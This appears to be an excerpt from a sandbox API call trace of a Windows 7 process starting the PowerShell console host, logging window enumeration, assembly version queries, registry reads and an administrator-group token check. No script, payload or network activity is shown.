	[0683.808] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x8d8
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x940
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x93c
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4ec
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x150
	[0683.808] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x720
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x3c4
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7d4
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x6c8
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb54
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb54
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb5c
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x838
	[0683.809] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x818
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x5b8
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x494
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x1ec
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x440
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x7e8
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x730
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x2c8
	[0683.810] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x31c
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x330
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x128
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x5c8
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x6f8
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x358
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x73c
	[0683.811] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0xb0
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x250
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x240
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x790
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x61c
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x568
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x538
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x540
	[0683.812] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0683.813] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x79c
	[0683.813] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x4e0
	[0683.813] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x460
	[0683.813] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x16dd60 | out: lpdwProcessId=0x16dd60) returned 0x778
	[0686.497] WerSetFlags () returned 0x0
	[0686.503] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0686.503] CoTaskMemFree (pv=0x0) 
	[0686.504] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e0c0 | out: pulNumLanguages=0x16e0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e0c0) returned 1
	[0686.504] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e0c8, pwszLanguagesBuffer=0x2b27098, pcchLanguagesBuffer=0x16e0c0 | out: pulNumLanguages=0x16e0c8, pwszLanguagesBuffer=0x2b27098, pcchLanguagesBuffer=0x16e0c0) returned 1
	[0686.509] CoTaskMemAlloc (cb=0x24) returned 0x345d90
	[0686.509] GetUserDefaultLocaleName (in: lpLocaleName=0x345d90, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0686.509] CoTaskMemFree (pv=0x345d90) 
	[0688.421] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0688.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.421] CoTaskMemFree (pv=0x2d2cb0) 
	[0688.423] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0688.423] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.423] CoTaskMemFree (pv=0x2d2cb0) 
	[0688.425] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0688.425] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0688.425] CoTaskMemFree (pv=0x2d2cb0) 
	[0688.435] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dfb0 | out: lpdwHandle=0x16dfb0) returned 0x94c
	[0689.859] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b2a928 | out: lpData=0x2b2a928) returned 1
	[0689.860] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df28, puLen=0x16df20 | out: lplpBuffer=0x16df28*=0x2b2a9c4, puLen=0x16df20) returned 1
	[0689.860] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2aaa0, puLen=0x16de90) returned 1
	[0689.860] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0689.860] CoTaskMemAlloc (cb=0x2e) returned 0x3422d0
	[0689.860] lstrcpyW (in: lpString1=0x3422d0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0689.860] CoTaskMemFree (pv=0x3422d0) 
	[0689.860] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2aaf4, puLen=0x16de90) returned 1
	[0689.860] lstrlenW (lpString="System.Management.Automation") returned 28
	[0689.860] CoTaskMemAlloc (cb=0x3c) returned 0x348890
	[0689.860] lstrcpyW (in: lpString1=0x348890, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0689.860] CoTaskMemFree (pv=0x348890) 
	[0689.860] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2ab50, puLen=0x16de90) returned 1
	[0689.860] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.860] CoTaskMemAlloc (cb=0x20) returned 0x345dc0
	[0689.861] lstrcpyW (in: lpString1=0x345dc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.861] CoTaskMemFree (pv=0x345dc0) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2ab90, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.861] CoTaskMemAlloc (cb=0x44) returned 0x348890
	[0689.861] lstrcpyW (in: lpString1=0x348890, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.861] CoTaskMemFree (pv=0x348890) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2abf8, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0689.861] CoTaskMemAlloc (cb=0x76) returned 0x2df3d0
	[0689.861] lstrcpyW (in: lpString1=0x2df3d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0689.861] CoTaskMemFree (pv=0x2df3d0) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2ac94, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0689.861] CoTaskMemAlloc (cb=0x44) returned 0x348890
	[0689.861] lstrcpyW (in: lpString1=0x348890, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0689.861] CoTaskMemFree (pv=0x348890) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2acf8, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0689.861] CoTaskMemAlloc (cb=0x58) returned 0x2a04c0
	[0689.861] lstrcpyW (in: lpString1=0x2a04c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0689.861] CoTaskMemFree (pv=0x2a04c0) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2ad74, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0689.861] CoTaskMemAlloc (cb=0x20) returned 0x345dc0
	[0689.861] lstrcpyW (in: lpString1=0x345dc0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0689.861] CoTaskMemFree (pv=0x345dc0) 
	[0689.861] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x2b2aa1c, puLen=0x16de90) returned 1
	[0689.861] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0689.861] CoTaskMemAlloc (cb=0x66) returned 0x33ade0
	[0689.862] lstrcpyW (in: lpString1=0x33ade0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0689.862] CoTaskMemFree (pv=0x33ade0) 
	[0689.862] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x0, puLen=0x16de90) returned 0
	[0689.862] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x0, puLen=0x16de90) returned 0
	[0689.862] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16de98, puLen=0x16de90 | out: lplpBuffer=0x16de98*=0x0, puLen=0x16de90) returned 0
	[0689.862] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16de68, puLen=0x16de60 | out: lplpBuffer=0x16de68*=0x2b2a9c4, puLen=0x16de60) returned 1
	[0689.862] CoTaskMemAlloc (cb=0x204) returned 0x2e1ec0
	[0689.862] VerLanguageNameW (in: wLang=0x0, szLang=0x2e1ec0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0689.862] CoTaskMemFree (pv=0x2e1ec0) 
	[0689.862] VerQueryValueW (in: pBlock=0x2b2a928, lpSubBlock="\\", lplpBuffer=0x16deb8, puLen=0x16deb0 | out: lplpBuffer=0x16deb8*=0x2b2a950, puLen=0x16deb0) returned 1
	[0689.863] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0689.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.863] CoTaskMemFree (pv=0x2d2cb0) 
	[0689.865] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0689.865] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0689.865] CoTaskMemFree (pv=0x2d2cb0) 
	[0690.162] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd88 | out: phkResult=0x16dd88*=0x310) returned 0x0
	[0690.166] RegOpenKeyExW (in: hKey=0x310, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16dd78 | out: phkResult=0x16dd78*=0x314) returned 0x0
	[0690.166] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de08 | out: phkResult=0x16de08*=0x318) returned 0x0
	[0690.169] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd4c, lpData=0x0, lpcbData=0x16dd48*=0x0 | out: lpType=0x16dd4c*=0x1, lpData=0x0, lpcbData=0x16dd48*=0x56) returned 0x0
	[0690.170] CoTaskMemAlloc (cb=0x5a) returned 0x33ad70
	[0690.170] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd1c, lpData=0x33ad70, lpcbData=0x16dd18*=0x56 | out: lpType=0x16dd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dd18*=0x56) returned 0x0
	[0690.170] CoTaskMemFree (pv=0x33ad70) 
	[0690.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0690.175] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0691.857] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0691.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0691.857] CoTaskMemFree (pv=0x2d2cb0) 
	[0710.145] CoTaskMemAlloc (cb=0x104) returned 0x353f70
	[0710.145] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x353f70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.145] CoTaskMemFree (pv=0x353f70) 
	[0710.146] CoTaskMemAlloc (cb=0x104) returned 0x353f70
	[0710.146] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x353f70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0710.146] CoTaskMemFree (pv=0x353f70) 
	[0713.107] CoTaskMemAlloc (cb=0x104) returned 0x354f70
	[0713.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354f70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.107] CoTaskMemFree (pv=0x354f70) 
	[0713.108] CoTaskMemAlloc (cb=0x104) returned 0x354f70
	[0713.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354f70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.108] CoTaskMemFree (pv=0x354f70) 
	[0713.108] CoTaskMemAlloc (cb=0x104) returned 0x354f70
	[0713.108] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x354f70, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0713.108] CoTaskMemFree (pv=0x354f70) 
	[0719.418] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0719.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.418] CoTaskMemFree (pv=0x2d2cb0) 
	[0719.421] CoTaskMemAlloc (cb=0x104) returned 0x2d2cb0
	[0719.421] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d2cb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0719.422] CoTaskMemFree (pv=0x2d2cb0) 
	[0737.253] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0737.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.253] CoTaskMemFree (pv=0x1b742240) 
	[0740.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x16da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0740.156] SetErrorMode (uMode=0x1) returned 0x1
	[0740.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x16dce0 | out: lpFileInformation=0x16dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0740.156] SetErrorMode (uMode=0x1) returned 0x1
	[0747.166] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.166] CoTaskMemFree (pv=0x1b742240) 
	[0747.167] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.167] CoTaskMemFree (pv=0x1b742240) 
	[0747.167] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.167] CoTaskMemFree (pv=0x1b742240) 
	[0747.169] CoCreateGuid (in: pguid=0x16e0a8 | out: pguid=0x16e0a8*(Data1=0xeceb9e60, Data2=0x1167, Data3=0x49be, Data4=([0]=0xb8, [1]=0xce, [2]=0x68, [3]=0xd, [4]=0x6a, [5]=0x73, [6]=0x37, [7]=0xe0))) returned 0x0
	[0747.173] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.173] CoTaskMemFree (pv=0x1b742240) 
	[0747.176] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.176] CoTaskMemFree (pv=0x1b742240) 
	[0747.178] CoTaskMemAlloc (cb=0x104) returned 0x1b742240
	[0747.179] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b742240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0747.179] CoTaskMemFree (pv=0x1b742240) 
	[0747.197] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0748.565] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x16dd50 | out: lpConsoleScreenBufferInfo=0x16dd50) returned 1
	[0748.582] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0748.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x16dd50 | out: lpConsoleScreenBufferInfo=0x16dd50) returned 1
	[0748.584] GetVersionExW (in: lpVersionInformation=0x16dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x16dce0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0748.587] GetCurrentProcess () returned 0xffffffffffffffff
	[0748.588] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x16dd78 | out: TokenHandle=0x16dd78*=0x318) returned 1
	[0748.592] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dc98 | out: TokenInformation=0x0, ReturnLength=0x16dc98) returned 0
	[0748.593] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a7310
	[0748.593] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x2a7310, TokenInformationLength=0x4, ReturnLength=0x16dc98 | out: TokenInformation=0x2a7310, ReturnLength=0x16dc98) returned 1
	[0748.594] DuplicateTokenEx (in: hExistingToken=0x318, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x16ddf8 | out: phNewToken=0x16ddf8*=0x314) returned 1
	[0748.595] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16dc98 | out: TokenInformation=0x0, ReturnLength=0x16dc98) returned 0
	[0748.595] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2a7340
	[0748.595] GetTokenInformation (in: TokenHandle=0x318, TokenInformationClass=0x8, TokenInformation=0x2a7340, TokenInformationLength=0x4, ReturnLength=0x16dc98 | out: TokenInformation=0x2a7340, ReturnLength=0x16dc98) returned 1
	[0748.596] CheckTokenMembership (in: TokenHandle=0x314, SidToCheck=0x2bf9c20*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x16de08 | out: IsMember=0x16de08) returned 1
	[0748.596] CloseHandle (hObject=0x314) returned 1
	[0748.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0748.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d7b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
